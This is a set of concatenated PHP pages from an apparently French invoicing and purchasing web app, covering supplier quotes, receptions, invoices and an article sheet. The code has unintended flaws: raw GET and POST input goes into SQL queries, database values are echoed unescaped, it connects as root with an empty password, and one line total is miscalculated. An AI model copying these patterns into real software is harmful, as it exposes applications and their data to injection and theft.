<td class="text-right"><?php echo $donnee_fact_four['pvht7'] * $donnee_fact_four['qte7']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art8'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art8']; ?></td>
<td><?php echo $donnee_fact_four['qte8']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht8']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht8'] * $donnee_fact_four['qte1']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art9'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art9']; ?></td>
<td><?php echo $donnee_fact_four['qte9']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht9']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht9'] * $donnee_fact_four['qte9']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art10'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art10']; ?></td>
<td><?php echo $donnee_fact_four['qte10']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht10']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht10'] * $donnee_fact_four['qte10']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art11'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art11']; ?></td>
<td><?php echo $donnee_fact_four['qte11']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht11']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht11'] * $donnee_fact_four['qte11']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art12'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art12']; ?></td>
<td><?php echo $donnee_fact_four['qte12']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht12']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht12'] * $donnee_fact_four['qte12']; ?> €</td>
</tr>
<?php } ?><br><br><br><br>
<tr></tr>
<tr>
<td colspan="2" rowspan="4" ><h4 class="semi-bold">Extrait des Conditions générales de Ventes</h4>
<p>Si votre paiement execede les 30 jours, le taux d'interet est fixé à 1,5% par jours passée.</p>
<h5 class="text-right semi-bold"></h5></td>
<td class="text-right"><strong>Frais de Port</strong></td>
<td class="text-right"><?php echo $donnee_fact_four['port']; ?> €</td>
</tr>
<td class="text-right no-border"><strong>Remise</strong></td>
<td class="text-right"><?php echo $donnee_fact_four['remise']; ?> €</td>
</tr>
<tr>
<td class="text-right no-border"><strong>Total HT</strong></td>
<td class="text-right"><?php echo $donnee_fact_four['ptht_fact_four']; ?> €</td>
</tr>
<tr>
<td class="text-right no-border"><strong>Total TVA</strong></td>
<td class="text-right"><?php echo $donnee_fact_four['taxe_fact_four']; ?> €</td>
</tr>
<tr>
<td></td>
<td></td>
<td class="text-right no-border"><div class="well well-small green"><strong>Total TTC</strong></div></td>
<td class="text-right"><strong><?php echo $donnee_fact_four['ptttc_fact_four']; ?> €</strong></td>
</tr>
<tr>
<td></td>
<td></td>
<td class="text-right no-border"><strong>Votre Réglement</strong></td>
<td class="text-right"><?php echo $reg_fact; ?> €</td>
</tr>
</tbody>
</table>
<br>
<br>
<br>
<br>
</div>
</div>
</div>
<div class="col-md-1">
<div class="invoice-button-action-set">
<p>
<a href="pdf.facture.php?idfactfour=<?php echo $donnee_fact_four['idfactfour']; ?>"><button class="btn btn-info" type="button"><i class="fa fa-print"></i></button></a>
</p>
<p>
<a href="reg.facture.php?idfactfour=<?php echo $donnee_fact_four['idfactfour']; ?>"><button class="btn btn-success" type="button"><i class="fa fa-credit-card"></i></button></a>
</p>
<div aria-hidden="true" aria-labelledby="myModalLabel" role="dialog" tabindex="-1" id="transfere" class="modal fade" style="display: none;">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button aria-hidden="true" data-dismiss="modal" class="close" type="button">×</button>
<br>
<i id="icon-resize" class="fa fa-exchange fa fa-6x custom-icon-space"></i>
<h4 class="semi-bold" id="myModalLabel">Transfere</h4>
<p class="no-margin">Transferer Cette Commande en Bon de Livraison ! </p>
<br>
</div>
<div class="modal-body">
<center>
<i id="animate-icon" class="fa fa-spinner fa fa-9x fa-spin"></i><br>
<p><h3>Transfere du Bon de Reception <b>N°RECFOUR000<?php echo $donnee_fact_four['idfactfour']; ?></b> vers FACTURE <b>N° FACTFOUR000<?php echo $donnee_fact_four['idfactfour']; ?></b> en cours...</h3></p>
</center>
</div>
<div class="modal-footer">
<button data-dismiss="modal" class="btn btn-warning" type="button">Annuler</button>
<a href="transfere.facture.php?idfactfour=<?php echo $donnee_fact_four['idfactfour']; ?>"> <button class="btn btn-primary" type="button">Transfere</button></a>
</div>
</div>
<!-- /.modal-content -->
</div>
<!-- /.modal-dialog -->
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idreceptionfour = $_GET['idreceptionfour'];
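// Issuing company for the header, plus the reception joined with its supplier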
$sql_societe = mysql_query("SELECT * FROM societe WHERE idsociete = 1");
$sql_reception_four = mysql_query("SELECT * FROM fournisseur, reception_four WHERE reception_four.idfournisseur = fournisseur.idfournisseur AND idreceptionfour=".$idreceptionfour);
$donnee_societe = mysql_fetch_array($sql_societe);
$donnee_reception_four = mysql_fetch_array($sql_reception_four);
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<div class="row">
<div class="col-md-11">
<div class="grid simple">
<div class="grid-body no-border invoice-body"> <br>
<div class="pull-left"> <img src="<?php echo $rootsite; ?>assets/img/invoicelogo.png" data-src="<?php echo $rootsite; ?>assets/img/invoicelogo.png" data-src-retina="<?php echo $rootsite; ?>assets/img/invoicelogo2x.png" width="222" height="31" class="invoice-logo" alt="">
<address>
<strong><?php echo $donnee_societe['raison_social']; ?></strong><br>
<?php echo $donnee_societe['adresse1']; ?><br>
<?php echo $donnee_societe['cp']; ?> <?php echo $donnee_societe['ville']; ?><br>
<abbr title="Phone">Téléphone:</abbr> <?php echo $donnee_societe['tel']; ?><br>
<abbr title="Mail">Mail:</abbr><?php echo $donnee_societe['mail']; ?>
</address>
</div>
<div class="pull-right">
<h2>BON DE RECEPTION</h2><b>
<h6>Fournisseur</h6>
</div>
<div class="clearfix"></div>
<br>
<br>
<br>
<div class="row">
<div class="col-md-9">
<h1>
</div>
<div class="col-md-3"> <br>
<div>
<div class="pull-left"> BON DE RECEPTION N° : </div>
<div class="pull-right"> CMDFOUR000<?php echo $donnee_reception_four['idreceptionfour']; ?> </div>
<div class="clearfix"></div>
</div>
<div>
<div class="pull-left"> DATE DE LA RECEPTION : </div>
<div class="pull-right"> <?php echo $donnee_reception_four['date_reception_four']; ?> </div>
<div class="clearfix"></div>
</div>
<br>
</div>
</div>
<table class="table">
<thead>
<tr>
<th class="text-left">DESCRIPTION</th>
<th style="width:30px">QTE</th>
</tr>
</thead>
<tbody>
<?php
if($donnee_reception_four['art1'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art1']; ?></td>
<td><?php echo $donnee_reception_four['qte1']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art2'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art2']; ?></td>
<td><?php echo $donnee_reception_four['qte2']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art3'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art3']; ?></td>
<td><?php echo $donnee_reception_four['qte3']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art4'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art4']; ?></td>
<td><?php echo $donnee_reception_four['qte4']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art5'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art5']; ?></td>
<td><?php echo $donnee_reception_four['qte5']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art6'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art6']; ?></td>
<td><?php echo $donnee_reception_four['qte6']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art7'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art7']; ?></td>
<td><?php echo $donnee_reception_four['qte7']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art8'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art8']; ?></td>
<td><?php echo $donnee_reception_four['qte8']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art9'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art9']; ?></td>
<td><?php echo $donnee_reception_four['qte9']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art10'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art10']; ?></td>
<td><?php echo $donnee_reception_four['qte10']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art11'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art11']; ?></td>
<td><?php echo $donnee_reception_four['qte11']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art12'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art12']; ?></td>
<td><?php echo $donnee_reception_four['qte12']; ?></td>
</tr>
<?php } ?><br><br><br><br>
<tr></tr>
</tbody>
</table>
<br>
<br>
<br>
<br>
</div>
</div>
</div>
<div class="col-md-1">
<div class="invoice-button-action-set">
<p>
<a href="pdf.reception.php?idcmdfour=<?php echo $donnee_reception_four['idreceptionfour']; ?>"><button class="btn btn-info" type="button"><i class="fa fa-print"></i></button></a>
</p>
<p>
<button class="btn btn-danger" type="button" data-target="#transfere" data-toggle="modal"><i class="fa fa-exchange"></i></button>
</p>
<div aria-hidden="true" aria-labelledby="myModalLabel" role="dialog" tabindex="-1" id="transfere" class="modal fade" style="display: none;">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button aria-hidden="true" data-dismiss="modal" class="close" type="button">×</button>
<br>
<i id="icon-resize" class="fa fa-exchange fa fa-6x custom-icon-space"></i>
<h4 class="semi-bold" id="myModalLabel">Transfere</h4>
<p class="no-margin">Transferer ce Bon de Reception en Facture ! </p>
<br>
</div>
<div class="modal-body">
<center>
<i id="animate-icon" class="fa fa-spinner fa fa-9x fa-spin"></i><br>
<p><h3>Transfere de la Reception <b>N°RECFOUR000<?php echo $donnee_reception_four['idreceptionfour']; ?></b> vers FACTURE <b>N° FACFOUR000<?php echo $donnee_reception_four['idreceptionfour']; ?></b> en cours...</h3></p>
</center>
</div>
<div class="modal-footer">
<button data-dismiss="modal" class="btn btn-warning" type="button">Annuler</button>
<a href="transfere.reception.php?idreceptionfour=<?php echo $donnee_reception_four['idreceptionfour']; ?>"> <button class="btn btn-primary" type="button">Transfere</button></a>
</div>
</div>
<!-- /.modal-content -->
</div>
<!-- /.modal-dialog -->
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
$idfournisseur = $_POST['idfournisseur'];
$date_devis_four = $_POST['date_devis_four'];
$date_echeance_devis_four = $_POST['date_echeance_devis_four'];
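// Up to 12 article line slots posted from the quote form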
$idarticle1 = $_POST['idarticle1'];
$idarticle2 = $_POST['idarticle2'];
$idarticle3 = $_POST['idarticle3'];
$idarticle4 = $_POST['idarticle4'];
$idarticle5 = $_POST['idarticle5'];
$idarticle6 = $_POST['idarticle6'];
$idarticle7 = $_POST['idarticle7'];
$idarticle8 = $_POST['idarticle8'];
$idarticle9 = $_POST['idarticle9'];
$idarticle10 = $_POST['idarticle10'];
$idarticle11 = $_POST['idarticle11'];
$idarticle12 = $_POST['idarticle12'];
$qte1 = $_POST['qte1'];
$qte2 = $_POST['qte2'];
$qte3 = $_POST['qte3'];
$qte4 = $_POST['qte4'];
$qte5 = $_POST['qte5'];
$qte6 = $_POST['qte6'];
$qte7 = $_POST['qte7'];
$qte8 = $_POST['qte8'];
$qte9 = $_POST['qte9'];
$qte10 = $_POST['qte10'];
$qte11 = $_POST['qte11'];
$qte12 = $_POST['qte12'];
$pvht1 = $_POST['prix_vente_ht1'];
$pvht2 = $_POST['prix_vente_ht2'];
$pvht3 = $_POST['prix_vente_ht3'];
$pvht4 = $_POST['prix_vente_ht4'];
$pvht5 = $_POST['prix_vente_ht5'];
$pvht6 = $_POST['prix_vente_ht6'];
$pvht7 = $_POST['prix_vente_ht7'];
$pvht8 = $_POST['prix_vente_ht8'];
$pvht9 = $_POST['prix_vente_ht9'];
$pvht10 = $_POST['prix_vente_ht10'];
$pvht11 = $_POST['prix_vente_ht11'];
$pvht12 = $_POST['prix_vente_ht12'];
$remise = $_POST['remise'];
$port = $_POST['port'];
$eco_part = $_POST['eco-part'];
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$ptht_devis_four = ($pvht1*$qte1)+($pvht2*$qte2)+($pvht3*$qte3)+($pvht4*$qte4)+($pvht5*$qte5)+($pvht6*$qte6)+($pvht7*$qte7)+($pvht8*$qte8)+($pvht9*$qte9)+($pvht10*$qte10)+($pvht11*$qte11)+($pvht12*$qte12)+$port+$eco_part-$remise;
$tva = $ptht_devis_four*20/100;
$ptttc_devis_four = $ptht_devis_four+$tva;
$sql_devis_four = "INSERT INTO `devis_four`(`iddevisfour`, `idfournisseur`, `date_devis_four`, `etat_devis_four`, `date_echeance_devis_four`, `art1`, `qte1`, `art2`, `qte2`, `art3`, `qte3`, `art4`, `qte4`, `art5`, `qte5`, `art6`, `qte6`, `art7`, `qte7`, `art8`, `qte8`, `art9`, `qte9`, `art10`, `qte10`, `art11`, `qte11`, `art12`, `qte12`, `pvht1`, `pvht2`, `pvht3`, `pvht4`, `pvht5`, `pvht6`, `pvht7`, `pvht8`, `pvht9`, `pvht10`, `pvht11`, `pvht12`, `port`, `remise`, `eco-part`, `ptht_devis_four`, `taxedevisfour`, `ptttc_devis_four`)
VALUES ('','$idfournisseur','$date_devis_four','1','$date_echeance_devis_four','$idarticle1','$qte1','$idarticle2','$qte2','$idarticle3','$qte3','$idarticle4','$qte4','$idarticle5','$qte5','$idarticle6','$qte6','$idarticle7','$qte7',
'$idarticle8','$qte8','$idarticle9','$qte9','$idarticle10','$qte10','$idarticle11','$qte11','$idarticle12','$qte12','$pvht1','$pvht2','$pvht3','$pvht4','$pvht5','$pvht6','$pvht7','$pvht8','$pvht9','$pvht10','$pvht11',
'$pvht12','$port','$remise','$eco_part','$ptht_devis_four','$tva','$ptttc_devis_four')";
$result_devis_four = mysql_query($sql_devis_four);
$error = mysql_error();
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.devis.php">DEVIS</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Nouveau Devis</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Nouveau Devis</span></h3>
</div>
<?php
if($result_devis_four == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> Le Devis en date du <b><?php echo $date_devis_four; ?></b> à été créer avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($result_devis_four == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une Erreur de type <b><?php echo $error; ?></b> s'est produit. Vérifier votre Code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.devis.php" class="active">DEVIS</a></li>
</ul>
<div class="page-title"> <a href="<?php echo $rootsite; ?>"><i class="icon-custom-left"></i></a>
<h3>Achat - <span class="semi-bold">DEVIS</span></h3>
</div>
<div class="row-fluid">
<div class="span12">
<div class="grid simple ">
<div class="grid-title">
<h4>Liste des <span class="semi-bold">Devis Fournisseur</span></h4>
<a href="nouv.devis.php"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-plus"></i> Nouveau Devis</button></a>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<table class="table table-striped" id="example2" >
<thead>
<tr>
<th>ID Devis</th>
<th>Date du Devis</th>
<th>Fournisseur</th>
<th>Prix Total TTC</th>
<th>Action</th>
<th HIDDEN>Etat</th>
</tr>
</thead>
<tbody>
<?php
$sql_devis_four = mysql_query("SELECT * FROM devis_four, fournisseur WHERE devis_four.idfournisseur = fournisseur.idfournisseur");
while($donnee_devis_four = mysql_fetch_array($sql_devis_four))
{
?>
<tr class="odd gradeX">
<td>DEVFOUR000<?php echo $donnee_devis_four['iddevisfour']; ?></td>
<td><?php echo $donnee_devis_four['date_devis_four']; ?></td>
<td><?php echo $donnee_devis_four['raison_social']; ?></td>
<td><?php echo $donnee_devis_four['ptttc_devis_four']; ?> €</td>
<td>
<a href="fiche.devis.php?iddevisfour=<?php echo $donnee_devis_four['iddevisfour']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eye"></i> Fiche Devis</button></a>
<a href="supp.devis.php?iddevisfour=<?php echo $donnee_devis_four['iddevisfour']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eraser"></i> Supprimer</button>
</td>
<td HIDDEN>
<?php
switch($donnee_devis_four['etat_devis_four'])
{
case 1:
echo "<p class='text-info'>Devis édité</p>";
break;
case 2:
echo "<p class='text-success'>Devis Accepté</p>";
break;
case 3:
echo "<p class='text-error'>Devis Refusé</p>";
break;
case 9:
echo "<p class='text-success'>Transféré en Commande</p>";
break;
}
?>
</td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/js/jquery.dataTables.min.js" type="text/javascript" ></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/extra/js/TableTools.min.js" type="text/javascript" ></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/datatables.responsive.js"></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/lodash.min.js"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/datatables.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html>
<file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idarticle = $_GET['idarticle'];
$sql_article = mysql_query("SELECT * FROM article, fournisseur, famille_article, sous_famille_article
WHERE fournisseur.idfournisseur = article.idfournisseur
AND famille_article.idfamillearticle = article.idfamillearticle
AND sous_famille_article.idsousfamillearticle = article.idsousfamillearticle
AND idarticle=".$idarticle);
$donnee_article = mysql_fetch_array($sql_article);
$date = date("d-m-Y");
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li><p>Vous êtes Ici</p></li>
<li><a href="index.php">Article</a></li>
<li><a href="#" class="active">Fiche Article - <?php echo $donnee_article['desc_court']; ?></a> </li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>Article - <span class="semi-bold">ART000<?php echo $donnee_article['idarticle']; ?> - <?php echo $donnee_article['desc_court']; ?></span></h3>
</div>
<br>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Article - <span class="semi-bold">Général</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<table width="100%">
<tr>
<td>Article N°</td>
<td>ART000<?php echo $donnee_article['idarticle']; ?></td>
</tr>
<tr>
<td>Libellé</td>
<td><?php echo $donnee_article['desc_court']; ?></td>
</tr>
<tr>
<td>Fournisseur</td>
<td><?php echo $donnee_article['raison_social']; ?></td>
</tr>
<tr>
<td>Code Barre</td>
<td><?php echo $donnee_article['code_barre']; ?></td>
</tr>
<tr>
<td>Famille Article</td>
<td><?php echo $donnee_article['designation']; ?></td>
</tr>
<tr>
<td>Sous Famille Article</td>
<td><?php echo $donnee_article['designation_famille']; ?></td>
</tr>
<tr>
<td>Référence Fournisseur</td>
<td><?php echo $donnee_article['ref_fournisseur']; ?></td>
</tr>
<tr>
<td>Référence Interne</td>
<td><?php echo $donnee_article['ref_interne']; ?></td>
</tr>
<tr>
<td>En Stock à partir du:</td>
<td>
<?php
if(strtotime($donnee_article['date_debut']) >= strtotime($date)){echo "<font color=red>".$donnee_article['date_debut']."</font>";}else{echo $donnee_article['date_debut'];}
?>
</td>
</tr>
</table>
</div>
</div>
</div>
</div>
